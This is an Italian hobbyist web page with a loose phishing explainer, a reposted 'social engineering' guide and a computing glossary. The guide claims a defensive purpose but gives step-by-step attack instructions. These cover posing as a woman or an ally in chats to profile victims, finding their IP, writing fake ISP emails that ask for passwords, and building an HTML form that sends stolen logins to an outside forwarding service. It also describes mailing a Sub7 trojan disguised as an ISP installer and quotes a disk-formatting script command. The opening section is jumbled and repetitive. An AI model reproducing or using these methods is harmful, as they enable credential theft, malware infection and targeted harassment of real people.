Informatica

  • Fenomeni crescenti
  •  
  • il phishing (“spillaggio (di dati sensibili)”, 
  •  
  •  Di Maurizio tiezzi 
  •  
  • Si parla molto  di phishing ma pochi sanno di che cosa veramente si tratta,quando  un  mio vicino pensionato che mi aveva consultato per una e-mail sospetta  e io l’ ho informato che poteva essere phishing,ha sbottato “ma parla  come si mangia con tutti sti termini istruiti un ci si capisce na sega”.

    Allora gli ho spiegato  Il phishing è una attività illegale che sfrutta una tecnica di ingegneria sociale, ed è utilizzata per ottenere l'accesso a informazioni personali o riservate con la finalità del furto di identità mediante l'utilizzo delle comunicazioni elettroniche, soprattutto messaggi di posta elettronica fasulli o messaggi istantanei, ma anche contatti telefonici. Grazie a questi messaggi, l'utente è ingannato e portato a rivelare dati personali, come numero di conto corrente, numero di carta di credito, codici di identificazione, ecc.

    Madonna Bona come sei stato bravo ho inteso e un ti fregheno a te he  mi ha detto in dialetto toscano,ho capito sti farabutti gn’oranti hanno studio e ora ti fregheno anche col compiuter Dio li stramaledica …

    E’forte il mio vicino ha fatto la 3° elementare ma da vecchio si e’ dato da fare con lo studio della terza eta’ e corsi  vari compreso il pc

    .  Ma veniamo al nostro  Phishing,studiamoci un po’ i processi, che volendo si possono riassumere in queste tre fasi:  

  • l'utente malintenzionato (phisher) spedisce al malcapitato ed ignaro utente un messaggio email che simula, nella grafica e nel contenuto, quello di una istituzione nota al destinatario (per esempio la sua banca, il suo provider web, un sito di aste online a cui è iscritto) ha volte anche una fantomatica amante, che vuole conoscerti e che si e’ innamorata pazzamente di te3.     l'email invita il destinatario a seguire un link, presente nel messaggio, per evitare l'addebito e/o per regolarizzare la sua posizione con l'ente o la società di cui il messaggio simula la grafica e l'impostazione non lo fate mai neppure se e’ quello della parrocchia. il link fornito, tuttavia, non porta in realtà al sito web ufficiale, ma ad una copia fittizia apparentemente simile al sito ufficiale, situata su un server controllato dal phisher, allo scopo di richiedere ed ottenere dal destinatario dati personali particolari, normalmente con la scusa di una conferma o la necessità di effettuare una autenticazione al sistema; queste informazioni vengono memorizzate dal server gestito dal phisher e quindi finiscono nelle mani del malintenzionato. il phisher utilizza questi dati per acquistare beni, trasferire somme di denaro o anche solo come “ponte” per ulteriori attacchi.Si tratta del denaro rubato con lo spillaggio, per il quale il titolare del conto online, spesso in buona fede, commette il reato di riciclaggio di denaro sporco. Quest'attività comporta per il phisher la perdita di una certa percentuale di quanto è riuscito a sottrarre, ma esiste comunque un interesse a disperdere il denaro in molti conti correnti e a fare girate in differenti Paesi, perché diviene più difficile risalire al suo conto e dati identificativi. Ma allora come ci possiamo difendere?Un primo controllo per difendersi dai siti di spillaggio che tentano di sottrarre i dati della carta di credito, è quello di visualizzare l'icona (a forma di lucchetto in tutti i browser) che segnala che sì è stabilita una connessione sicura (ad esempio una connessione SSL). La pagina di autenticazione è facilmente imitabile, copiando il relativo codice HTML, mentre la presenza di una connessione sicura richiede dei certificati che identificano univocamente un sito Internet.Gli utenti di Internet Explorer possono utilizzare un filtro anti-spillaggio che utilizza una blacklist, e confronta gli indirizzi di una pagina web sospetta con quelli presenti in una banca dati mondiale e centralizzata, gestita da Microsoft e alimentata dalle segnalazioni anonime degli utenti stessi.Mancano invece banche dati di questo tipo condivise dai vari produttori di browser, pubbliche o istituite presso autorità che hanno la competenza sulle tematiche di Internet e del web (in Italia, la Polizia Postale).È possibile associare ad una pagina di un “sito esca” un indirizzo simile, ma non identico a quello del sito “copiato”. Due pagine web, infatti, non possono avere lo stesso indirizzo IP né lo stesso indirizzo logico, che è associato ad un solo indirizzo IP.Come vedete ci si puo’ tranquillamente difendere,il mezzo migliore e’ riflettere prima di rispondere a chiunque,il minimo di buonsenso sara’ bastante a non farci mai trovare nei casini.
  • Meditate gente
  • All'utente medio resta comunque difficile distinguere un sito di phishing da quello dell'istituto di credito preso di mira. La barra degli indirizzi può contenere un indirizzo del tipo “Nome della Banca.autethicationPage.php@indirizzo del dominio ospitante”, l'indirizzo del dominio ospitante nel corrispondente indirizzo IP, il simbolo “@” nella codifica ASCII, o nell'equivalente binario o esadecimale, rendendo l'indirizzo della risorsa di “phishing” simile e poco più lungo di quello che è stato falsificato.
  • L'oscuramento di un sito di spillaggio non è un'operazione semplice, se questo è ospitato come sottodominio di un altro indirizzo web. In quel caso, è necessario l'oscuramento del dominio ospitante, poiché la “falsa” pagina di autenticazione non è presente nell'elenco ICANN, ma in locale sul server. Il sito oscurato può essere comunque velocemente associato ad un altro indirizzo web.
  • Analoga protezione è presente in Mozilla Firefox (a partire dalla versione 2), che propone all'utente di scegliere tra la verifica dei siti sulla base di una blacklist e l'utilizzo del servizio anti-spillaggio offerto da Google.
  • Se l'utente non è titolare di un conto corrente online e riceve gli estratti conto periodici per posta ordinaria (non via email), può impostare il filtro anti-spam sull'indirizzo dell'istituto di credito. In questo modo, le email contenenti un indirizzo del mittente o un link nel testo alla banca, saranno inserite nella cartella dello spam, rendendo più facilmente identificabili quelle sospette.
  • Una delle miglior cose da fare è capire come ha fatto il perpetratore a sapere che hanno un conto presso la banca o servizio online indicato nel messaggio-esca. In realtà, normalmente il phisher non sa se la sua vittima ha un account presso il servizio preso di mira dalla sua azione: si limita ad inviare lo stesso messaggio-esca a un numero molto elevato di indirizzi di email, facendo spamming, nella speranza di raggiungere per caso qualche utente che ha effettivamente un account presso il servizio citato. Pertanto non è necessaria alcuna azione difensiva a parte il riconoscimento e la cancellazione dell'email che contiene il tentativo di spillaggio.
  • Se i trasferimenti coinvolgono più Paesi, i tempi per la ricostruzione dei movimenti bancari si allungano, poiché serve una rogatoria e l'apertura di un procedimento presso la magistratura locale di ogni Paese interessato.
  • Talora, l'email contiene l'invito a cogliere una nuova “opportunità di lavoro”, a dare le coordinate bancarie del proprio conto online per ricevere l'accredito di somme che vanno poi trasferite ad altri conti, trattenendo una percentuale dell'importo, che può arrivare a cifre molto alte. Solitamente, il trasferimento avviene con bonifici gratuiti, sempre via Internet, verso un altro conto online.
  • 2.     . l'email contiene quasi sempre avvisi di particolari situazioni o problemi verificatesi con il proprio conto corrente/account (ad esempio un addebito enorme, la scadenza dell'account ecc.) qualche cazzata per sapere il tuo indirizzo di casa la targa della macchina ecc.
  • Ma veniamo al nostro  Phishing,studiamoci un po’ i processi, che volendo si possono riassumere in queste tre fasi:
  • E’forte il mio vicino ha fatto la 3° elementare ma da vecchio si e’ dato da fare con studio della terza eta’ e corsi  vari compreso il pc,
  • Allora gli ho spiegato  Il phishing è una attività illegale che sfrutta una tecnica di ingegneria sociale, ed è utilizzata per ottenere l'accesso a informazioni personali o riservate con la finalità del furto di identità mediante l'utilizzo delle comunicazioni elettroniche, soprattutto messaggi di posta elettronica fasulli o messaggi istantanei, ma anche contatti telefonici. Grazie a questi messaggi, l'utente è ingannato e portato a rivelare dati personali, come numero di conto corrente, numero di carta di credito, codici di identificazione, ecc.
  •  
  •  
  •  

Tecniche moderne

Benvenuti nel mio spazio navigatori e navigatrici..   Chi sono? Non lo so a volte non mi riconosco neanche io, uno dei tanti,o forse no uno dei pochi

Conoscere per prevenire

INGEGNERIA SOCIALE 

(Social engenering)

Questa guida,  , è stata scritta per insegnare gli utenti inesperti a difendersi dagli attacchi lamer.
Tutti gli attacchi descritti sono spiegati solo per poterli facilmente individuare.

Social Engineering può essere tradotto con ingegneria sociale, ovvero la scienza che si occupa dei rapporti con gli altri…
Il social engineering, infatti è “l’arte” che permette di ottenere informazioni e/o compiere azioni che normalmente sono riservate a pochi.
Come si realizza questo? Semplice, spacciandosi per uno di quei pochi!
In pratica il social engineering si basa sulla menzogna, si contatta una vittima, ci si finge qualcun altro che in qualche modo potrebbe essere, od è, legato alla vittima e si prova ad ottenere informazioni e/o a compiere azioni sotto la falsa identità.

Ecco un esempio:
Se telefono a un tizio e gli chiedo di darmi il numero della sua carta di credito, lui come minimo mi ride in faccia e mi riempie di insulti… ma se invece chiamo il tizio e mi spaccio per un impiegato della sua banca (meglio ancora se realmente esistente), dicendo che dobbiamo effettuare un operazione temporanea di transito del suo capitale a causa di problemi interni e che abbiamo bisogno del suo numero per risolverli… bhè, al 90% otterremo quello che vogliamo (dipende sempre dall’altra persona, e da quanto riusciamo ad essere convincenti).
Logicamente il social engineering non è una scienza esatta, se pretendete di mandare una fake email alla casa bianca dicendo di essere il presidente e di voler sapere i codici per attivare una guerra nucleare perchè ve li siete scordati, non credo che verrete tanto creduti…
Ricordate sempre la buona riuscita dell’operazione di social engineering si basa sempre su due fattori:
1- La nostra abilità e furbizia.
2- La demenza della vittima =)
Spero che sia chiaro che l’esempio di prima era solo un esempio, qui non imparerete a carpire i numeri di carta di credito (anche perchè è inllegale e contro i miei principi ,quello che è lo scopo di ciò che vi dico e solo il sapere)!

Allora, per poter comprendere appieno questa guida è necessario avere conoscenze basi di HMTL & JAVASCRIPT, alcuni esempi che farò saranno interamente basati su questi due linguaggi, benchè cercherò di spiegarli in modo da farli capire anche a un neofita la conoscenza di essi è indispensabile per chi vuole operare da se e non limitarsi a eseguire un copia e incolla dei  listati.
Per quanto riguarda i programmi, c’è bisogno di un buon trojan e di un buon fake mailer/bomber
Inoltre è necessario un requisito personale, che purtroppo nessuno vi può dare, la rapidità di pensiero e di organizzazione. La prima è necessaria per sapersela cavare in ogni situazione imprevista, la seconda per saper pianificare al meglio le nostre azioni.

Il social engineering nelle chat può essere effettuato per diverse ragioni:
– Venire a conoscenza di quante più informazioni sulla vittima per poter essere in grado di compilare una word list con delle password che lui potrebbe usare (per utilizzarla da qualche parte).
– Sapere l’indirizzo email della vittima.
– Ottenere l’IP della vittima.
– Infettare la vittima con un trojan.

Ma vediamo le cose con calma.

Per ottenere quante più informazioni possibili su di una vittima ci sono diversi modi.
Il più semplice, dal punto di vista della realizzazione, è quello di chattare con la vittima, mantenendo il dialogo sempre su di un tono molto tranquillo…
Mi spiego meglio: se contattiamo un tizio in chat e senza dargli il tempo di parlare gli chiediamo, nome, cognome, città, hobby, ecc… difficilmente otterremo una risposta.
Ma se con lui instauriamo un rapporto di amicizia reciproca e magari salviamo ogni volta la conversazione che abbiamo avuto, alla fine saremo in grado di stilare una word list.
Questa operazione può richiedere da alcuni giorni ad alcune settimane, e non sempre porta a buoni risultati, ma in genere è la più sicura, in quanto la vittima, se siete abili, non potrà mai sospettare nulla di voi, per qualsiasi cosa gli accada… =)
Questa tecnica ha un problema di fondo, si basa sul dialogo, e considerando che in genere si cerca di fare del male a persone con cui non si hanno buoni rapporti… è un pò difficile pretendere di minacciare uno di morte e il giorno dopo, come per magia, pretendere che chatti con voi d’amore e d’accordo…

In questo ci può aiutare il social engineering.
Ci sono diverse tecniche per riuscire a chattare con la vittima:
1- Il modo più semplice per chattare con un uomo qual’è? Semplice… fingere di essere una donna!
Questa tecnica permette nel 99% dei casi la buona riuscita dell’obbiettivo preposto.
Per farlo è necessario crearsi nella chat un nick di donna (se si usano chat basate su programmi tipo C6. altrimenti è sufficiente collegarsi con un nick di donna nelle chat basate sul web/java), e contattare la vittima.
Il primo grande problema che si incontra utilizzando questa tecnica, è quello che non appena si accede in chat con un nick di donna si viene bombardati da richieste di altri uomini (richieste di sesso x di più!). Per questo è indispensabile rendersi indisponibili a chattare con gli altri (sempre se si usa un programma di chat tipo C6, in cui cioè, è possibile selezionare una opzione simile) per potersi concentrare sul proprio obbiettivo.

Se invece la vittima è disposta almeno nelle prime volte al dialogo, bhè, dateci dentro e cercate di ottenre quante più informazioni potete, magari la prima volta fate una specie di botta-risposta per conoscerlo, in pratica proponete che ognuno parli di se. Abbiate cura al termine della conversazione di salvarla per poterla osservare con cura in seguito. Inoltre prima di un’azione del genere preparate una scheda su di voi, in modo da non creare sospetti nel caso non vi venisse al momento cosa inventare su una determinata domanda fatta dalla vittima, per essere ancora più convincenti mandategli anche una vostra foto… logicamente non vostra =) ma di una ragazza con cui avete chattato, in quanto deve essere credibile (se mandate una foto presa dal sito di pamela andersson non penso vi crederà… =).

2- Un altro metodo è quello di diventare “colleghi” della vittima.
Ovvero prendiamo il caso che il bastardo sia uno che va nelle chat a dire cose tipo “meridionali di merda, terroni, ecc..”, bhè… persone così non sono altro che ignoranti e stupide, quindi degli ottimi bersagli per il social engineering =)
Come ci dobbiamo comportare noi? Semplice, assecondiamolo, comportiamoci come lui, diamo forza alle sue menate.
Poi contattiamolo in privato e iniziamo a chattarci.
Questa è una tecnica che può ferire un pò nell’orgoglio, in quanto io, da napoletano, non direi nemmeno se costretto con una pistola alla tempia “terroni di merda”, ma basta pensare che questo piccolo sacrificio con buona probabilità ci permetterà di fare davvero del male al coglione, che tutto risulta più facile…
Questa tecnica è un pò rischiosa, in quanto alle volte ci si fa scoprire dalla vittima in quanto si usa un espressione o si dice qualcosa che uno come lui non direbbe mai (se ad esempio vi scappa un’espressione napoletana tipo “azz'” mentre chattate con quello che attacca i terroni, vi fate scoprire).

3- Una evoluzione della tecnica precedente è quella di utilizzare due nick contemporaneamente nella stessa chat dove è presente la vittima.
Tale tecnica può essere realizzata facilmente in chat basate sul web (tipo quella di yahoo, ecc..) aprendo due volte contemporaneamente la stessa pagina (quindi eseguendo due volte il browser) e entrando con due nick diversi.
Nelle chat basate su programmi c’è bisogno di un piccolo accorgimento.

Ora che abbiamo due nick possiamo guadagnare molto più facilmente la fiducia della vittima.
Ad esempio con un nick lo attacchiamo, riempiendolo di parole, sfottendolo, offendendolo, e con l’altro lo difendiamo, per poi andarlo a contattare in privato, magari per commentare la demenza della persona che lo attaccava (sempre voi).

Logicamente queste 3 tecniche servono solo per farvi conoscere la persona, il dialogo poi lo dovete impostare voi a seconda dei casi, non esiste una regola generale su come comportarsi.
L’importante è sempre di immergersi nel personaggio che si sta fingendo di essere, in modo da non tradirsi mai.

Una volta che siete riusciti a chattare con la vittima non dovrebbe risultare difficile ottenere la sua email, soprattutto se si utilizza un nick di ragazza e si esegue la parte seguente:
ci si collega, si contatta la vittima, ci si parla un poco, e dopo un paio di minuti all’improvviso si dice che per un motivo qualsiasi dovete andare subito, ma… ma, ditegli anche che volete restare in contatto con lui, e che volete la sua email, se lui è diffidente dategli una vostra creata appositamente per le operazioni di social engineering e ditegli di contattarvi lì (abbiate cura nella scelta dell’email, se il vostro nick è ad es.: beba24, l’email non potrà essere giovanni_rossi@tin.it).

Ottenere l’IP della vittima è un operazione semplicissima, basta collegarsi con un nick di ragazza, chattare  un pò e poi mandargli la vostra foto (quella falsa, di cui ho parlato prima), che lui sicuramente vorrà.
Logicamente per fare ciò c’è bisogno di una chat che permette lo scambio di files, altrimenti niente!
Non appena la foto comincerà ad essere inviata, aprite una finestra MS-Dos (Avvio–>Esegui–>command oppure doppio clik sull’icona di ms-dos presente in avvio) e digitate il seguente comando:

c:\>netstat -an

Tale comando visualizzerà tutte le connessioni attive al momento, e quindi anche l’IP della vittima.

Tutte le tecniche illustrate sopra sono rivolte contro vittime maschi, ma se vogliamo attaccare una ragazza?
Bhè… il discorso diventa molto più complicato,
Comunque provate sempre, la speranza è l’ultima a morire.
Il modo per riuscire a colpire col maggior danno possibile un utente di internet qual’è?
Semplice, infettarlo con un trojan!
Tutti gli attacchi di questo modo su IP al massimo gli fanno crashare il pc, un trojan è (quasi) per sempre e dà poteri pressapoco illimitati sul pc vittima!
Non vi spiegherò come usare un trojan, ne come infettare una vittima via chat.

La prima regola del social engineering è quella di fingere, camuffare e mentire sempre.
Ci sono due casi principali, quando si vuole carpire dati a qualcuno:
1) La persona che si vuole fregare è un perfetto sconosciuto.
2) La persona designata ci da la sua fiducia (poichè siamo riusciti a guadagnarla grazie alle tecniche spiegate nella sezione (3).

I

Invece per cosa fare con l’email della vittima?
 SOCIAL ENGINEERING APPLICATO ALLE EMAIL]

Il social engineering applicato alle email è sicuramente più difficile nella realizzazione di quello applicato alle chat, ma se svolto con cura permette di ottenere migliori risultati (in genere…).

Lo scopo principale del social engineering applicato alle email è quello di ottenere una password dell’account dell’utente, del suo sito personale, ecc..
Per fare ciò ci sono diverse tecniche:

1- Ci si crea un indirizzo email dello stesso dominio della vittima, con nick tipo serv_assist, assistenza, marketing, sevizio.assistenza ecc…
In pratica se la vittima ha un indirizzo ciccio@isp.it noi dobbiamo andare a crearci un indirizzo tipo serv_assist@isp.it . Fatto ciò scriviamo una bella email alla vittima in cui diciamo più o meno così:

>Gentile Utente,
> A causa di problemi tecnici alcune informazioni sui nostri utenti sono state smarrite.
> Per poterle ripristinare abbiamo bisogno del suo login e della sua password, pertanto la preghiamo di
> inviarceli a questo indirizzo: serv_assist@isp.it
> Certi della sua collaborazione la ringraziamo.
>
> Il Responsabile Tecnico isp.it
> Ing. Mario Monti

Logicamente potete inventare scuse meglio articolate per rendere il tutto più credibile.
Però… questa tecnica, ha possibilità di riuscita tendente a 0… Bisogna solo essere così fortunati da trovare un utente che ha acquistato il suo primo pc un giorno prima (che tralatro deve essere pure un pò idiota…).
Io qui l’ho citata per non tralasciare niente, ma vi sconsiglio vivamente di usarla, anche perchè così rischiate solo di mettere in allerta la vittima, che riconsocerà molto più facilmente eventuali tentativi di social engineering.

2- Questa tecnica richiede una maggiore preparazione, ma garantisce probabilità di riuscita nettamente superiori alla prima.
La prima cosa che dobbiamo fare è studiare il provider che fornisce l’email alla vittima.
Facciamo sempre l’esempio che la vittima abbia come indirizzo cicco@isp.it .
Noi ci colleghiamo al sito di isp.it e preleviamo i loghi in esso presenti, se magari ci creiamo un account su di esso e aspettiamo che ci venga inviata un email da loro (in genere ogni ISP ha un servizio di newsletter abbinato alla casella email). Terminata questa fase di studio prepariamo un email che sia quanto più familiare al sito, e alle email inviate.
Ad esempio, se l’isp invia email mettendo in alto una fascia verde con all’interno il suo logo, noi ripeteremo esattamente il procedimento visto nel punto 1 ma aggiungendo i particolari grafici appropiati.
Per fare ciò è necessario conoscere l’HTML in quanto bisognerà creare una pagina HTML per poi passare tutto il codice in un email.

3- La terza tecnica è una seccessiva evoluzione della seconda.
In pratica è richiesta la stessa preparazione con una piccola aggiunta alla fine…
La piccola aggiunta consiste nell’inserimento di un form, ovvero di due campi in cui la vittima deve inserire il proprio login e password e cliccare poi sul pulsante invia.
L’email si presenterà esattamente come quella spiegata nel punto 2 soltanto che l’aggiunta del form la farà sembrare ancora più autentica.
Però sorge un problema… per utilizzare un form è necessario poter disporre di un server che gestisca script cgi, il che è praticamente impossibile nei servizi gratuiti, quindi o sborsate per un server, o… vi affidate a qualche servizio di gestione form gratuito tipo Bravenet (www.bravenet.com).
Una volta registrati al servizio vi verrà fornito il codice HTML che dovrete inserire nel vostro sito.
Però il codice che vi verrà fornito visualizzerà la loro grafica e i loro pulsanti, e questo a noi certo non va bene… per questo bisogna modificarlo e renderlo simile a quello sottostante.

<form action=”http://pub14.bravenet.com/emailfwd/senddata.asp” method=”post”>

<input type=”hidden” name=”usernum” value=”xxxxxxxx”>
<input type=”hidden” name=”cpv” value=”1″>

Login: <input type=”text” name=”login” size=”20″>

Password: <input type=”text” name=”password” size=”20″>

<input type=”submit” name=”submit” value=” Invia “>

</form>

(le xxxxxxxx sono il vostro numero identificativo di bravenet)

I primi due campi input non devono essere modificati, in quanto sono quelli che bravenet usa per riconoscervi, i secondi due sono quelli che definiscono i campi che la vittima deve compilare, l’ultimo è quello che definisce il pulsante invia.

Il codice HTML soprastante può essere inserito in tabelle e contornato da elementi grafici (ad esempio si può usare come pulsante invia l’immagine utilizzate da isp.it per i suoi pulsanti).
Se magari nel sito di isp.it è presente una mascherina per accedere alla posta via web, possiamo copiare il codice che ci interessa dalla loro pagina e modificare solo i campi del form inerenti all’invio dei dati (che non dovranno più essere usati per accedere all’area utente, ma che ci dovranno essere inviati).
Il tutto sta nella vostra capacità realizzativa.

Tale tecnica è senza dubbio la migliore e la più efficace in quanto non richiede di possedere un indirizzo email appropriato, poichè la vittima ci invierà i dati tramite il form presente nell’email.
Quindi in questo caso dovremmo utilizzare un programma tipo Xmass2000 con cui inviare la nostra fake email basata sull’HTML preparato.

Sia la tecnica 2 che la 3 necessitano di immagini, tali immagini possono essere prelevate dal sito proprietario dell’email della vittima (negli esempi fatti isp.it) e caricate su un qualsiasi server gratuito (ormai ogni ISP offre uno spaio web gratuito) per poterle poi utlizzare quando si vuole ed evitare che eventuali aggiornamenti del sito da cui sono state prelevate compromettano il nostro operato.
Se infatti ad esempio il logo di isp.it ha indirizzo http://isp.it/img/loghi/logo_main.gif e noi utilizziamo questo indirizzo nel nostro codice HTML e libero lo cambia per qualsiasi motivo, bhè… il nostro piano fallisce ancora prima di cominciare!
 FARE MALE QUALCUNO VIA EMAIL]

Ci sono diversi modi di fare male qualcuno via email, ma anche qui il modo che comporta maggior danno è quello di riuscire a infettarlo con un trojan.
Molti lamer inviano fakemail a indirizzi vari con un file .exe allegato, magari lasciando anche il testo vuoto, sperando nella curiosità/stupidità di chi riceve l’email.
Ma questo è un sistema che ormai non funziona nemmemo per sbaglio…
Quindi per poter sperare che la vittima esegua il nostro bel server dobbiamo affidarci ancora una volta al social engineering.

A mio parere la tecnica più affidabile è la seguente:

Inviamo una fake email come spiegato nella seconda tecnica nella sezione (5) alla vittima spacciandoci per l’ISP che gestisce il suo indirizzo con il seguente testo:

>Gentile Utente,
> Siamo lieti di informala che da oggi è possibile utilizzare il nuovo programma di connessione di
> inn.it.
> Il nuovo programma vi permetterà di ottenere connessioni più sicure e più stabili.
> Tale programma le è stato allegato a questa email, per poterlo utilizzare è necessario eseguire
> il file allegato e seguire i semplici passi dell’installazione.
> Per eventuali dubbi o domande inviate un email a assist_tecn@innp.it
>
>
> Il Responsabile Tecnico isp.it
> Ing. Lino Bolli

(l’indirizzo assist_tecn@isp.it deve essere inventato, di certo non vi interessa conoscere le lamentele delle vittime =)

Come allegato dell’email inseriremo il server del nostro sub7 avendo cura di modificare l’icona con quella del vero programma di connessione dell’ISP.
Magari per rendere la cosa quanto meno sospetta possiamo far generare un messaggio di errore al server di sub7 in modo che l’utente creda che ci sia stato qualche problema.
Per ottenere le icone dei vari ISP è sufficente trovare un cd di connessione a internet che viene distribuito nei negozi, per strada, nei giornali.
Tutti gli ISP distribuisco il proprio CD gratuitamente da qualche parte.
Se proprio non riuscite a trovarlo, provate a chiedere a qualche vostro amico se utilizza quel determinato ISP.
Se anche questa ricerca risulta infruttuosa, provate a vedere sul sito dell’ISP se è possibile scaricare il loro programma di connessione, in genere dopo che ci si è registrati si ha tale possibilità.

COME DIFENDERSI]
Questa guida, come detto nel primo disclaimer, è stata scritta per insegnare gli utenti inesperti a difendersi dagli attacchi lamer.
Tutti gli attacchi descritti sono stati spiegati per poterli facilmente individuare.
In questa sezione però vi darò altri consigli per poterli prevenire e/o annullare.

Per quanto riguarda le chat, c’è poco da dire, la diffidenza è l’unica arma, che però se accompagnata da un buon firewall e da un buon antivirus assicura una discreta sicurezza.
Logicamente il mio consiglio è quello di non eseguire mai file che ci vengono date da persone in chat, a meno che non siano nostri amici (reali) di lunga data.

Per quanto riguarda le email il discorso cambia.
Infatti oltre al solito suggerimento di cestinare all’istante le email di provenienza sconosciuta contenenti allegati .exe e di utilizzare un antivirus ci sono altri accorgimenti per prevenire attacchi basati su script allegati alle mail.
Se infatti si subisce un attacco basato su un javascript basta riavviare il pc, eseguire Internet Explorer e andare in OPZIONI–>PROTEZIONE–>PERSONALIZZA LIVELLO e disattivando controlli e plug-in Active-X e esecuzione script.
Poi riavviare Outlook e selezionare il messaggio “infetto”, questa volta però non accadrà niente e potremo cancellarlo liberamente.
Un consiglio generale è anche quello di rinominare i files comando più pericolosi come i seguenti:

format.com –> form.com
deltree.exe –> dt.exe

tali files sono contenuti nella cartella windows\command\ e possono essere rinominati col seguente comando:

c:\>rename comando.xxx nuovo_nome.xxx

dove xxx è l’estensione del file.
In tal modo eventuali tentativi di formattarci il disco rigido non avranno successo in quanto nello script ci sarà una riga di questo genere:
comando_js(“format c: /q /autotest >> NULL”)
che otterrà come risultato solo un misero “comando o nome di file non valido” =)

LA GUIDA E UN PO VECCHIA MA I CONCETTI SONO SEMPRE GLI STESSI

FONTI WEB,TASTIERA MAUSE

MI RACOMANDO solo per difendevi,  queste cose non pagano e altrimenti prima o poi vi prendono

DIZIONARIO INFORMATICO

A

Absolute URL Il completo indirizzo Internet di una pagina o di altra risorsa World Wide Web.

Access Provider E' la società che offre, a diversi canoni e con diverse modalità possibili, l'accesso a Internet.

Account Fornitura da parte di un access provider di una serie di servizi sulla Rete, quale per esempio una casella di posta elettronica, accessibile tramite identificazione di Nome Utente e Password.

ACPI (Advanced Configuration and Power Interface) Gestione dell'economia di energia conforme a Windows. Sarà integrata nei futuri PC da ufficio, come pure nei portabili.

Active Hyperlink Un iperlink attivato nell'esploratore Web. Alcuni browsers indicano che il link è attivato, cambiando il suo colore.

ActiveX OLE2 (Object Linking and Embedding) Ideato da Microsoft, ma riveduto e corretto per prendere in carico le ultime evoluzioni di Internet. La questione é talmente importante che Microsoft ha accettato di confidarne la sorte ad un organismo indipendente.

ADO (Active Data Objects) Componente che consente ad applicazioni clienti di accedere e manipulare dati in un file o in una database di un server, attraverso un provider.

ADSL (Asymmetric Digital Subscriber Line) Tecnologia xDSL asimmetrica (velocità di Upstrem e Downstream diverse), utilizzata principalmente per l'accesso a Internet.

Applet Un'applicazione realizzata nel linguaggio Java. Tutti i browser più diffusi sono in grado di eseguire queste applicazioni, che dotano le pagine Web di funzionalità più avanzate rispetto a quelle implementabili in HTML.

ARP (Address Resolution Protocol) Protocollo per la risoluzione dell'indirizzo. Un protocollo di basso livello della famiglia TCP/IP che serve a ricavare l'indirizzo fisico della macchina ( quello della scheda ) partendo dal suo indirizzo IP.

ATM (Asynchronus Transfer Mode) Modalità di trasporto a pacchetto. Il traffico ADSL viene indirizzato attraverso una rete ATM.

Attachment Qualsiasi file collegato a un messaggio di Email è un attachment, o allegato.

Autenticazione L'autenticazione assicura che la trasmissione digitale dei dati è stata indirizzata al corretto ricevente, e garantisce al ricevente l'integrità del messaggio e la sua provenienza. La più semplice forma di autenticazione richiede un nome utente e una password per accedere a un particolare account. I protocolli di autenticazione possono però basarsi anche su scritture crittografate, come il DES, o su sistemi a chiave che utilizzano contrassegni digitali.

Algoritmo una procedura di calcolo o, più in generale, l'elenco delle operazioni necessarie per risolvere un problema in un numero finito di operazioni.

Alfanumerico (Alpha Numeric) caratteri alfabetico numerici usati nei computer per la programmazione o come codici di registrazione e password.

Analogico sistema di visualizzazione di dati che dà la sensazione di continuità. Per esempio, il tempo segnato dal movimento delle lancette di un orologio meccanico (con scatti impercepibili) dà una sensazione di continuità maggiore di quello segnato da un orologio digitale. La rappresentazione di un'onda (elettromagnetica, acustica, sismica) può dare la sensazione di c., sebbene utilizzando un apparecchio di rilevamento più sensibile, si possano evidenziare particolari più fini.

Animated GIF Un file contenente una serie di immagini GIF che vengono affisse in rapida sequenza nel browser, dando l'apparenza di figure in movimento.

Anonymous FTP Abilità di accedere ad un sistema remoto senza la necessità di avere un conto attivo, attraverso l'FTP (File Transfer Protocol). Molti siti FTP non consentono un accesso anonimo, per motivi di sicurezza.

Antialiasing Funzione di programma che permette di lisciare i contorni di un'immagine Bitmap (vedi il termine) come pure le zone di transizione entro i colori.

Apache è il nome del pacchetto software gratuito usato per creare server Web su macchine con sistema operativo Unix o Linux. I server Apache sono veloci e abbastanza stabili; inoltre si accoppiano bene con il sistema operativo Linux, anch'esso veloce e particolarmente economico.

API (Application Programming Interface) Biblioteca di funzioni indipendenti dal materiale utilizzato. In tal modo, un gioco sviluppato con l'Api di Direct3D funzionerà con carte grafiche 3D supportanti questa interfaccia, senza necessità di adattamenti.

Applet Piccolo programma Java destinato ad essere lanciato a partire da un'altra applicazione. Contrariamente ai programmi “ordinari” un Applet non puo' essere eseguito direttamente dal sistema operativo.

ASCII (American Standard Code for Information Interchange) Uno schema di codice utilizzante  7 o 8 bits che assegna valori numerici sino a 256 caratteri, inclusi lettere, numeri, punti e altri simboli. L'ASCII è stato sviluppato nel 1968 per standardizzare la trasmissione di dati fra diversi componenti  hardware e software ed è incluso in ogni computer.

Autentication In un ambiente network o multi-utilizzatori, é il processo attraverso il quale il sistema valida le informazioni dell'utilizzatore durante l'accesso. Il nome e la password dell'utilizzatore vengono comparati con una lista autorizzata: se il riscontro è positivo, il sistema autorizzerà l'accesso ai dati, applicando le restrizioni previste nella lista per lo specifico utilizzatore.

Avatar oggetto tridimensionale (a forma umana o altro) che rappresenta l'utente all'interno di un mondo virtuale in rete. Costituisce l'unico elemento attraverso cui segnalare la nostra presenza agli altri utenti.

 

B

Backbone (dorsale)  Rete di connessioni a banda larga tra centri di commutazione.

Banda Ampia  Circuito o canale di comunicazione di media capacità. Normalmente richiede una velocità da 64 Kbps a 1,544 Mbps.

Banda Larga Circuito o canale di comunicazione ad alta capacità. Generalmente richiede una velocità superiore a 1,544 Mbps.

Baud unità di misura della velocità di trasmissione di un modem. Indica il numero di variazioni di segnale che si avvicendano in un secondo. Poiché i sistemi di trasmissione dati implicano che questi viaggino anche compattati, la velocità di trasmissione espressa in BAUD non coincide necessariamente con il numero di bit trasmessi (che sono in numero molto maggiore); per questa ragione, si preferisce esprimere la velocità di trasmissione in bps: bit per secondo.

BBS (Bulletin Board System) Bollettino elettronico in cui gli utenti possono lasciare i loro messaggi. Molti BBS richiedono la registrazione dell'utente.

Bevel Effetto tridimensionale applicato ai bordi di un disegno.  

Bios (Basic Input Output System) Insieme di istruzioni di base che si interlacciano entro il materiale ed il sistema operativo. Servono, fra le altre cose, ad avviare il computer.

BIT (BInary digiT) unità elementare d'informazione, associata a variazioni definite di segnale elettrico. Una combinazione di bit può indicare un carattere alfabetico, una cifra numerica, o effettuare una segnalazione, una commutazione o un'altra funzione; in informatica il bit corrisponde al numero 1 oppure 0 (corrispondenti al “sì” o al “no”). 8 bits rappresentano un BYTE.
